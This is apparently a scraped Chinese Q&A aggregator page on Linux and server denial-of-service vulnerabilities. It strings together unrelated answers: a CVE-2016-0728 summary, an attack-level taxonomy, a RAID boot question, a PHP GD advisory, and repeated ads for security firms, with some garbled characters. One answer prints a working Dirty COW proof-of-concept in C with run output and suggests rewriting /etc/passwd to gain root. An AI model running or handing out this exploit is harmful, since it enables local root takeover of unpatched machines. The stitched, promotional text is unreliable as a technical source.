導航:首頁 > 編程系統 > linuxkernel拒絕服務漏洞

linuxkernel拒絕服務漏洞

發布時間:2021-02-25 23:02:04

『壹』 linux內核漏洞有哪些

安全研究團隊Perception Point發現Linux系統內核中存在一個高危級別的本地許可權提升0day漏洞,編號為CVE-2016-0728。目前有超過66%的安卓手機和版1000萬Linux PC和伺服器都受到這項內存泄露漏洞的影響。
漏洞介紹
Perception Point研究團隊發權現了一個Linux內核的本地提權漏洞。雖然這個漏洞自2012年便已經存在,但Perception Point團隊聲稱近期才發現這個漏洞,目前已經提交至內核安全團隊,後續還會發布PoC利用代碼。這個漏洞會影響到數以千萬計的Linux 個人計算機和伺服器,以及大約66%的安卓設備(包括手機和平板)。盡管Perception Point團隊以及內核安全團隊目前尚未發現針對這個漏洞的利用,我們還是建議安全團隊盡快檢測可能受此影響的設備,並打補丁。
本文我們將對漏洞的技術細節進行介紹,以及如何通過這個漏洞實現內核代碼執行。最終,PoC成功實現從本地用戶提許可權權至root許可權。

『貳』 什麼情況會導致linux伺服器上的5個會話都沒有了

隨著Linux企業應用的擴展,有大量的網路伺服器使用Linux操作系統。Linux伺服器的安全性能受到越來越多的關注,這里根據Linux伺服器受到攻擊的深度以級別形式列出,並提出不同的解決方案。 對Linux伺服器攻擊的定義是:攻擊是一種旨在妨礙、損害、削弱、破壞Linux伺服器安全的未授權行為。攻擊的范圍可以從服務拒絕直至完全危害和破壞Linux伺服器。對Linux伺服器攻擊有許多種類,本文從攻擊深度的角度說明,我們把攻擊分為四級。

攻擊級別一:服務拒絕攻擊(DoS)

由於DoS攻擊工具的泛濫,及所針對的協議層的缺陷短時無法改變的事實,DoS也就成為了流傳最廣、最難防範的攻擊方式。

服務拒絕攻擊包括分布式拒絕服務攻擊、反射式分布拒絕服務攻擊、DNS分布拒絕服務攻擊、FTP攻擊等。大多數服務拒絕攻擊導致相對低級的危險,即便是那些可能導致系統重啟的攻擊也僅僅是暫時性的問題。這類攻擊在很大程度上不同於那些想獲取網路控制的攻擊,一般不會對數據安全有影響,但是服務拒絕攻擊會持續很長一段時間,非常難纏。

到目前為止,沒有一個絕對的方法可以制止這類攻擊。但這並不表明我們就應束手就擒,除了強調個人主機加強保護不被利用的重要性外,加強對伺服器的管理是非常重要的一環。一定要安裝驗證軟體和過濾功能,檢驗該報文的源地址的真實地址。另外對於幾種服務拒絕可以採用以下措施:關閉不必要的服務、限制同時打開的Syn半連接數目、縮短Syn半連接的time out 時間、及時更新系統補丁。

攻擊級別二:本地用戶獲取了他們非授權的文件的讀寫許可權

本地用戶是指在本地網路的任一台機器上有口令、因而在某一驅動器上有一個目錄的用戶。本地用戶獲取到了他們非授權的文件的讀寫許可權的問題是否構成危險很大程度上要看被訪問文件的關鍵性。任何本地用戶隨意訪問臨時文件目錄(/tmp)都具有危險性,它能夠潛在地鋪設一條通向下一級別攻擊的路徑。

級別二的主要攻擊方法是:黑客誘騙合法用戶告知其機密信息或執行任務,有時黑客會假裝網路管理人員向用戶發送郵件,要求用戶給他系統升級密碼

由本地用戶啟動的攻擊幾乎都是從遠程登錄開始。對於Linux伺服器,最好的辦法是將所有shell賬號放置於一個單獨的機器上,也就是說,只在一台或多台分配有shell訪問的伺服器上接受注冊。這可以使日誌管理、訪問控制管理、釋放協議和其他潛在的安全問題管理更容易些。還應該將存放用戶CGI的系統區分出來。這些機器應該隔離在特定的網路區段,也就是說,根據網路的配置情況,它們應該被路由器或網路交換機包圍。其拓撲結構應該確保硬體地址欺騙也不能超出這個區段。

攻擊級別三:遠程用戶獲得特權文件的讀寫許可權

第三級別的攻擊能做到的不只是核實特定文件是否存在,而且還能讀寫這些文件。造成這種情況的原因是:Linux伺服器配置中出現這樣一些弱點:即遠程用戶無需有效賬號就可以在伺服器上執行有限數量的命令。

密碼攻擊法是第三級別中的主要攻擊法,損壞密碼是最常見的攻擊方法。密碼破解是用以描述在使用或不使用工具的情況下滲透網路、系統或資源以解鎖用密碼保護的資源的一個術語。用戶常常忽略他們的密碼,密碼政策很難得到實施。黑客有多種工具可以擊敗技術和社會所保護的密碼。主要包括:字典攻擊(Dictionary attack)、混合攻擊(Hybrid attack)、蠻力攻擊(Brute force attack)。一旦黑客擁有了用戶的密碼,他就有很多用戶的特權。密碼猜想是指手工進入普通密碼或通過編好程序的正本取得密碼。一些用戶選擇簡單的密碼-如生日、紀念日和配偶名字,卻並不遵循應使用字母、數字混合使用的規則。對黑客來說要猜出一串8個字生日數據不用花多長時間。

防範第三級別的攻擊的最好的防衛方法便是嚴格控制進入特權,即使用有效的密碼。 主要包括密碼應當遵循字母、數字、大小寫(因為Linux對大小寫是有區分)混合使用的規則。 使用象"#"或"%"或"$"這樣的特殊字元也會添加復雜性。例如採用"countbak"一詞,在它後面添加"#$"(countbak#$),這樣您就擁有了一個相當有效的密碼。

攻擊級別四:遠程用戶獲得根許可權

第四攻擊級別是指那些決不應該發生的事發生了,這是致命的攻擊。表示攻擊者擁有Linux伺服器的根、超級用戶或管理員許可權,可以讀、寫並執行所有文件。換句話說,攻擊者具有對Linux伺服器的全部控制權,可以在任何時刻都能夠完全關閉甚至毀滅此網路。

攻擊級別四主要攻擊形式是TCP/IP連續偷竊,被動通道聽取和信息包攔截。TCP/IP連續偷竊,被動通道聽取和信息包攔截,是為進入網路收集重要信息的方法,不像拒絕服務攻擊,這些方法有更多類似偷竊的性質,比較隱蔽不易被發現。一次成功的TCP/IP攻擊能讓黑客阻攔兩個團體之間的交易,提供中間人襲擊的良好機會,然後黑客會在不被受害者注意的情況下控制一方或雙方的交易。通過被動竊聽,黑客會操縱和登記信息,把文件送達,也會從目標系統上所有可通過的通道找到可通過的致命要害。黑客會尋找聯機和密碼的結合點,認出申請合法的通道。信息包攔截是指在目標系統約束一個活躍的聽者程序以攔截和更改所有的或特別的信息的地址。信息可被改送到非法系統閱讀,然後不加改變地送回給黑客。

TCP/IP連續偷竊實際就是網路嗅探,注意如果您確信有人接了嗅探器到自己的網路上,可以去找一些進行驗證的工具。這種工具稱為時域反射計量器(Time Domain Reflectometer,TDR)。TDR對電磁波的傳播和變化進行測量。將一個TDR連接到網路上,能夠檢測到未授權的獲取網路數據的設備。不過很多中小公司沒有這種價格昂貴的工具。對於防範嗅探器的攻擊最好的方法是:

1、安全的拓撲結構。嗅探器只能在當前網路段上進行數據捕獲。這就意味著,將網路分段工作進行得越細,嗅探器能夠收集的信息就越少。

2、會話加密。不用特別地擔心數據被嗅探,而是要想辦法使得嗅探器不認識嗅探到的數據。這種方法的優點是明顯的:即使攻擊者嗅探到了數據,這些數據對他也是沒有用的。

特別提示:應對攻擊的反擊措施

對於超過第二級別的攻擊您就要特別注意了。因為它們可以不斷的提升攻擊級別,以滲透Linux伺服器。此時,我們可以採取的反擊措施有: 首先備份重要的企業關鍵數據。 改變系統中所有口令,通知用戶找系統管理員得到新口令。 隔離該網路網段使攻擊行為僅出現在一個小范圍內。 允許行為繼續進行。如有可能,不要急於把攻擊者趕出系統,為下一步作準備。

記錄所有行為,收集證據。這些證據包括:系統登錄文件、應用登錄文件、AAA(Authentication、Authorization、 Accounting,認證、授權、計費)登錄文件,RADIUS(Remote Authentication
Dial-In User Service) 登錄,網路單元登錄(Network Element Logs)、防火牆登錄、HIDS(Host-base IDS,基於主機的入侵檢測系統) 事件、NIDS(網路入侵檢測系統)事件、磁碟驅動器、隱含文件等。收集證據時要注意:在移動或拆卸任何設備之前都要拍照;在調查中要遵循兩人法則,在信息收集中要至少有兩個人,以防止篡改信息;應記錄所採取的所有步驟以及對配置設置的任何改變,要把這些記錄保存在安全的地方。檢查系統所有目錄的存取許可,檢測Permslist是否被修改過。

進行各種嘗試(使用網路的不同部分)以識別出攻擊源。

為了使用法律武器打擊犯罪行為,必須保留證據,而形成證據需要時間。為了做到這一點,必須忍受攻擊的沖擊(雖然可以制定一些安全措施來確保攻擊不損害網路)。對此情形,我們不但要採取一些法律手段,而且還要至少請一家有權威的安全公司協助阻止這種犯罪。這類操作的最重要特點就是取得犯罪的證據、並查找犯罪者的地址,提供所擁有的日誌。對於所搜集到的證據,應進行有效地保存。在開始時製作兩份,一個用於評估證據,另一個用於法律驗證。

找到系統漏洞後設法堵住漏洞,並進行自我攻擊測試。

網路安全已經不僅僅是技術問題,而是一個社會問題。企業應當提高對網路安全重視,如果一味地只依靠技術工具,那就會越來越被動;只有發揮社會和法律方面打擊網路犯罪,才能更加有效。我國對於打擊網路犯罪已經有了明確的司法解釋,遺憾的是大多數企業只重視技術環節的作用而忽略法律、社會因素,這也是本文的寫作目的。

拒絕服務攻擊(DoS)

DoS即Denial Of Service,拒絕服務的縮寫,可不能認為是微軟的DOS操作系統!DoS攻擊即讓目標機器停止提供服務或資源訪問,通常是以消耗伺服器端資源為目標,通過偽造超過伺服器處理能力的請求數據造成伺服器響應阻塞,使正常的用戶請求得不到應答,以實現攻擊目的。
我們的Linux伺服器是4塊硬碟做的RAID5,一次停電後,一塊硬碟損壞,另三塊也提示fail,但force online後,用3塊硬碟可以正常啟動。

後換入一塊相同大小的舊硬碟(不知道有沒有舊數據),開機自動rebuild後,也要對新換的硬碟force online。

但不論插3塊還是4塊硬碟,linux系統都啟動失敗。
屏幕提示:

root(hd0,0)

Filesystem type is ext2fs,partition type 0x83

kernel /boot/vmLinuz-2.4.21-15smp ro root=/dev/sda1 devfs=mount quite 5 vag= 0x314

[Llinx -bzImage,setup=)x1400,size=0x1484d5]

Error 24 attempt to access block outside partition

請問:該怎麼解決?謝謝。

『叄』 Apache HTTP Server拒絕服務漏洞

更換為 nginx 吧。 如果你機器不是很多。這個變更會讓你感覺到很劃算。

『肆』 PHP GD Graphics Library拒絕服務漏洞

關於PHP GD Graphics Library存在拒絕服務漏洞的安全公告

時間:-02-02

2018年1月18日,國家信息安全漏洞共享平台(CNVD)收錄了PHP GD Graphics Library存在拒絕服務漏洞(CNVD-2018-02505,對應CVE-2018-5711)。綜合利用上述漏洞,攻擊者可以構造惡意GIF文件,遠程利用PHP函數形成無限循環的方式發起拒絕服務攻擊。目前,漏洞利用代碼已公開,且廠商已發布漏洞修復版本

一、漏洞情況分析

PHP(超文本預處理器)是一種通用開源腳本語言。GD Graphics Library(又名libgd或libgd2)是一個開源的用於動態創建圖像的庫,它支持創建圖表、圖形和縮略圖等,廣泛應用於PHP語言的開發。

該漏洞觸發的前提條件為受影響版本的PHP,並且使用了libgd庫,漏洞文件存在於ext/gd/libgd/gd_gif_in.c。在「LWZReadByte_」函數存在一個循環(while-loop),該循環里「GetCode_」函數會調用GetDataBlock來讀取GIF圖片中的數據,但由於「GetCode_」函數未能正確處理int到unsigned char的類型轉換,導致PHP在解析特定GIF文件調用PHP函數imagecreatefromgif或imagecreatefromstring時出現死循環,從而導致伺服器計算資源大量消耗,直至崩潰宕機。該漏洞允許遠程攻擊者利用該漏洞導致拒絕服務攻擊。

CNVD對上述漏洞的綜合評級為「高危」。

二、漏洞影響范圍

PHP 5 < 5.6.33版本

PHP 7.0 < 7.0.27版本

PHP 7.1 < 7.1.13版本

PHP 7.2 < 7.2.1版本

三、漏洞修復建議

目前,廠商已發布升級新版本以修復該漏洞,最新版本下載鏈接http://php.net/downloads.php。

附:參考鏈接:

http://php.net/ChangeLog-7.php

https://bugs.php.net/bug.php?id=75571

http://www.cnvd.org.cn/flaw/show/CNVD-2018-02505

『伍』 關於 "Apache Commons FileUpload 和 Tomcat拒絕服務漏洞(CVE-2014-0050) "

網站會容易被黑客抄攻擊,說明你的網站存在很多安全隱患,漏洞之類的,就算登錄伺服器找到源文件修復了,也會被黑客再次入侵,所以只有把網站的所有漏洞找出來進行修復,防止黑客的攻擊,避免安全事故發生,造成網頁掛馬、網頁內容被篡改、數據泄露等,可以找專業的網路安全公司來服務!國內也就Sinesafe和綠盟等安全公司 比較專業.

我是從事IDC行業的.以上這些也是平時工作中經常遇到的問題.希望我的回答對你有所幫助.

『陸』 vsftpd FTP Server 'ls.c' 遠程拒絕服務漏洞(CVE-2011-0762)

可以關閉匿名訪問,

不過最好的是升級一下vsftp

『柒』 linux內核通殺提權漏洞怎麼驗證

Linux內核在處理內存寫時拷貝(Copy-on-Write)時存在條件競爭漏洞,導致可以破壞私有隻讀內存映射。一個低許可權的本地用戶能夠利用此漏洞獲取其他只讀內存映射的寫許可權,有可能進一步導致提權漏洞。漏洞危害:低許可權用戶可以利用該漏洞修改只讀內存,進而執行任意代碼獲取 root 許可權。影響范圍:該漏洞影響所有 Linux Kernel >= 2.6.22 的版本。2.6.22 是 2007 年發布的版本,也就是說這個漏洞幾乎影響 2007 以後的所有版本。漏洞測試:讀取 /proc/version 來獲取 LinuxKernel 版本:
➜ ~ cat /proc/version
Linuxversion 4.4.0-42-generic(buildd@lgw01-13) (gcc version 5.4.0 20160609 (Ubuntu 5.4.0-6ubuntu1~16.04.2) )#62-Ubuntu SMP Fri Oct 7 23:11:45 UTC 20164.4.0 版本的Kernel,看樣子是受影響的,github 上給出了如下的 POC:
#include
#include
#include
#include
#include
void *map;
int f;
structstat st;
char*name;
void*madviseThread(void *arg) {
char *str;
str = (char *)arg;
int i, c = 0;
for (i = 0; i 100000000; i++) {
c += madvise(map, 100, MADV_DONTNEED);
}
printf("madvise %d\n", c);
}
void*procselfmemThread(void *arg) {
char *str;
str = (char *)arg;
int f = open("/proc/self/mem",O_RDWR);
int i, c = 0;
for (i = 0; i 100000000; i++) {
lseek(f, map, SEEK_SET);
c += write(f, str, strlen(str));
}
printf("procselfmem %d\n", c);
}
intmain(int argc, char *argv[]) {
if (argc 3)
return 1;
pthread_t pth1, pth2;
f = open(argv[1], O_RDONLY);
fstat(f, &st);
name = argv[1];
map = mmap(NULL, st.st_size, PROT_READ,MAP_PRIVATE, f, 0);
printf("mmap %x\n", map);
pthread_create(&pth1, NULL,madviseThread, argv[1]);
pthread_create(&pth2, NULL,procselfmemThread, argv[2]);
pthread_join(pth1, NULL);
pthread_join(pth2, NULL);
return 0;
}這個 POC 可以利用該漏洞修改任意文件內容,看下面的測試:
➜ /tmp gcc a.c -lpthread
a.c: Infunction 『procselfmemThread』:
a.c:28:5:warning: implicit declaration of function 『lseek』[-Wimplicit-function-declaration]
lseek(f, map, SEEK_SET);
a.c:29:10:warning: implicit declaration of function 『write』[-Wimplicit-function-declaration]
c += write(f, str, strlen(str));
a.c: Infunction 『main』:
a.c:39:3:warning: implicit declaration of function 『fstat』[-Wimplicit-function-declaration]
fstat(f, &st);調用 gcc 編譯這個 payload,報了幾個 warning,但還是編譯成功了。
➜ /tmp su root -c 'echo 0000 > test'
Password:
➜ /tmp ls -al test
-rw-r--r--1 root root 5 Oct 16 23:52 test使用 root 許可權創建一個其他用戶只讀的 test 文件,許可權為 644,內容為 0000。
➜ /tmp id
uid=1000(Monster) gid=1000(monster) groups=1000(monster)
➜ /tmp ./a.out test 1111
mmap61222000
madvise 0
procselfmem400000000使用當前用戶調用編譯出的 a.out 程序把 test 文件的內容修改為 1111,經過漫長的等待以後程序終於執行完成。
➜ /tmp cat test
1111可以看到結果,test 文件的內容已經被成功修改。
這樣的話,只要修改 /etc/passwd 把當前用戶的 uid 改成 0 就可以作為 root 登錄了。
修復方案:
更新最新 Linux Kernel 源碼,並重新編譯。 各大發行版也已經更新 Kernel,也可直接升級最新版本。

『捌』 如何修復 vsftpd ftp server ls.c'遠程拒絕服務漏洞

伺服器存在漏洞.應該及時找專業的人解決或者找專業的網路安全公司,防專止被黑客篡改網頁內屬容,泄露重要數據!國內也就Sinesafe和綠盟等安全公司 比較專業.

我是從事IDC行業的.以上這些也是平時工作中經常遇到的問題.希望我的回答對你有所幫助.

『玖』 OpenSSH復制塊遠程拒絕服務漏洞

OpenSSH是一種開放源碼的SSH協議的實現,初始版本用於OpenBSD平台,現在已經被移植到多種Unix/Linux類操作系統下。OpenSSH在處理報文中多個完全一樣的塊時存在拒絕服務漏洞,如果啟用了ssh協議1的話,則遠程攻擊者就可以通過發送特製的ssh報文耗盡CPU資源。
***************************************************************************************************************
臨時解決方法:如果您不能立刻安裝補丁或者升級,NSFOCUS建議您採取以下措施以降低威脅:*
停止使用SSH協議1,改用SSH協議2
***************************************************************************************************************廠商補丁:OpenSSH目前廠商已經發布了升級補丁以修復這個安全問題,請到廠商的主頁下載:ftp://ftp.openbsd.org/pub/OpenBSD/OpenSSH/portable/openssh-5.0p1.tar.gz

閱讀全文

與linuxkernel拒絕服務漏洞相關的資料

熱點內容
電影啟示女主是真的生小孩嘛 瀏覽:861
為神魔壓縮文件無圖標 瀏覽:134
潛江廣華電影院哪個好 瀏覽:555
psapp圖標教程 瀏覽:390
大數據文庫 瀏覽:29
家庭教師韓國電影推薦 瀏覽:966
票房大賣王排行榜怎麼祝賀 瀏覽:710
中國大數據中心選址 瀏覽:310
微信群名字顏色 瀏覽:413
電腦自動彈出刪除文件 瀏覽:210
美國大片哪個網站比較靠譜 瀏覽:456
一個男的吃了成精的人參是什麼電影 瀏覽:883
麗芙泰勒窗檯101 瀏覽:367
韓日電影愛情片免費看2020 瀏覽:224
易捷文件夾加密軟體下載 瀏覽:897
台灣電影女老師學生 瀏覽:826
手機可以在線觀看的網址 瀏覽:913
iso響應手機qq代碼 瀏覽:39
9300外屏更換教程 瀏覽:355

友情鏈接